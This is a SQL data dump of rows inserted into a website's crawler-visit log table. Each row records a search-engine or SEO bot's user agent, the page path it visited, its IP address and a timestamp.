INSERT INTO `ey_weapp_spider_visit` VALUES ('98466', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/372.html', '162.55.86.60', '1662196088', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98468', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/55.html', '116.179.32.226', '1662196130', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98469', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/429.html', '162.55.86.60', '1662196150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98470', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/432.html', '162.55.86.60', '1662196182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98477', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/470.html', '162.55.86.60', '1662196399', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98483', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/479.html', '162.55.86.60', '1662196555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98484', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/480.html', '162.55.86.60', '1662196588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98487', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/484.html', '162.55.86.60', '1662196682', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98491', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/498.html', '162.55.86.60', '1662196777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98492', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/84.html', '162.55.86.60', '1662196808', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98515', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/367.html', '220.181.108.112', '1662202208', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98516', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/33.html', '220.181.108.168', '1662203612', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98517', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.5', '1662203724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98520', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_31/', '185.191.171.40', '1662204804', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98522', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/144.html', '220.181.108.105', '1662206417', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98523', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/231.html', '216.244.66.194', '1662206814', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98524', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/191.html', '216.244.66.194', '1662206956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98525', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662207614', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98526', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/qiyexinwen', '220.181.108.177', '1662207818', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98528', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/139.html', '116.179.32.38', '1662209222', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98533', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/134.html', '116.179.32.161', '1662210624', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98534', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1662210803', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98548', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/442.html', '114.119.151.155', '1662212812', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98549', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_15', '114.119.151.155', '1662212965', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98553', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/225.html', '114.119.151.153', '1662213917', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98554', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/gz.html', '114.119.151.155', '1662214519', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98556', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/177.html', '66.249.79.110', '1662215187', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98559', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.108', '1662218314', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98561', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/465.html', '216.244.66.194', '1662218476', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98565', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bc/', '220.181.108.155', '1662220442', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98820', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_8/', '114.119.151.153', '1662361655', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98821', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/yqal/list_21_2/', '185.191.171.38', '1662362239', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98824', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/305.html', '66.249.79.110', '1662363234', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98827', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/236.html', '114.119.151.153', '1662364424', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98829', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.108', '1662365491', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98830', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/56.html', '220.181.108.146', '1662365936', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98831', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.113', '1662366159', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98832', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/267.html', '114.119.151.153', '1662367011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98833', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/188.html', '185.191.171.38', '1662367563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98835', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.108', '1662368885', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98838', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/389.html', '114.119.151.155', '1662370637', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98839', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/408.html', '185.191.171.25', '1662371444', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98841', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/395.html', '114.119.151.155', '1662372784', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98843', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/list_2_7/', '66.249.79.110', '1662373198', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98844', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/11.html', '185.191.171.12', '1662374683', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98845', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44.html', '185.191.171.1', '1662375039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98847', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/141.html', '185.191.171.39', '1662375915', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98850', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/nys.html', '114.119.151.153', '1662379270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98851', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/about/', '185.191.171.10', '1662380120', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98852', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/guigang.html', '114.119.151.153', '1662381755', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98857', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/blj', '116.179.32.75', '1662388503', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98859', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/156.html', '17.121.115.214', '1662389099', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98860', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/346.html', '17.121.112.230', '1662389159', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98866', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljwd', '220.181.108.156', '1662393413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98867', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/63.html', '185.191.171.9', '1662394692', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98868', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/232.html', '216.244.66.194', '1662395829', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98869', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/53.html', '66.249.79.112', '1662397734', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98870', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.9', '1662398289', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98871', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/119.html', '116.179.32.92', '1662398320', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98873', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662401623', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98874', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tbxw/', '66.249.79.110', '1662401917', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98875', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tbxw/', '66.249.79.106', '1662402949', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98878', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/455.html', '185.191.171.17', '1662404735', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98880', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw', '116.179.32.156', '1662408139', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98887', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/72.html', '185.191.171.44', '1662414153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98936', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.155', '1662446288', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98937', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/mys.html', '114.119.151.155', '1662446392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98938', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xts.html', '114.119.151.153', '1662446588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98939', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yzs.html', '114.119.151.153', '1662446689', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98940', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/498.html', '114.119.151.153', '1662446794', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98941', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/372.html', '185.191.171.6', '1662447125', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98942', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/192.html', '185.191.171.1', '1662447233', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98943', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/404.html?admin_id=1', '116.179.32.208', '1662447413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98946', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/438.html', '114.119.151.153', '1662448130', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98947', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/192.html', '114.119.151.155', '1662448256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98955', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/360.html', '66.249.79.110', '1662451013', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98960', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.18', '1662453177', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98961', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662453554', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98963', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/136.html', '185.191.171.25', '1662454465', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98985', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/honor/', '162.55.86.60', '1662457269', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98996', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/369.html', '162.55.86.60', '1662457305', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98997', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/371.html', '162.55.86.60', '1662457310', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98998', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/374.html', '162.55.86.60', '1662457312', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99004', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/392.html', '162.55.86.60', '1662457329', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99005', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/403.html', '162.55.86.60', '1662457332', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99027', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/71.html', '162.55.86.60', '1662457462', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97845', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/jiaruwomen', '114.119.151.153', '1661910599', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97846', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/273.html', '114.119.151.155', '1661910761', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97847', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wfs.html', '114.119.151.153', '1661910935', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97848', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/477.html', '114.119.151.155', '1661911103', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97851', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/330.html', '116.179.32.153', '1661911471', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97852', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.148', '1661912114', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97853', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_67/', '114.119.151.155', '1661912208', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97854', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/322.html', '114.119.151.153', '1661912379', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97855', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1661912385', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97856', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/498.html', '61.135.159.210', '1661912435', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97857', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jxs.html', '114.119.151.153', '1661912540', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97859', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ganshusheng.html', '114.119.151.153', '1661913349', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97897', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1661936375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97898', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.73', '1661936561', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97900', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.5', '1661936572', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97901', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31.html?tagid=31', '185.191.171.40', '1661937480', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97918', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/16_2.html', '185.191.171.25', '1661944536', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97924', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_14.html', '185.191.171.7', '1661945810', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97925', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/121.html', '216.244.66.194', '1661947264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97929', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661948409', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98050', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/191.html', '185.191.171.8', '1662014185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98055', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/252.html', '185.191.171.6', '1662017089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98131', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.108', '1662054193', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98132', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '59.58.228.36', '1662055138', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98133', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/61.html', '185.191.171.38', '1662055246', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98134', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/193.html', '220.181.108.93', '1662055400', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98139', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/134.html', '66.249.79.110', '1662057426', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98140', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/453.html', '66.249.79.112', '1662057539', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98142', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.110', '1662059686', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98152', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/89.html', '66.249.79.110', '1662065408', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98153', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_69/', '66.249.79.108', '1662066049', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98156', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.110', '1662068185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98158', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zz.html', '114.119.151.155', '1662069408', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98159', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/151.html', '114.119.151.155', '1662069701', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98162', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/336.html', '185.191.171.38', '1662070340', '0');
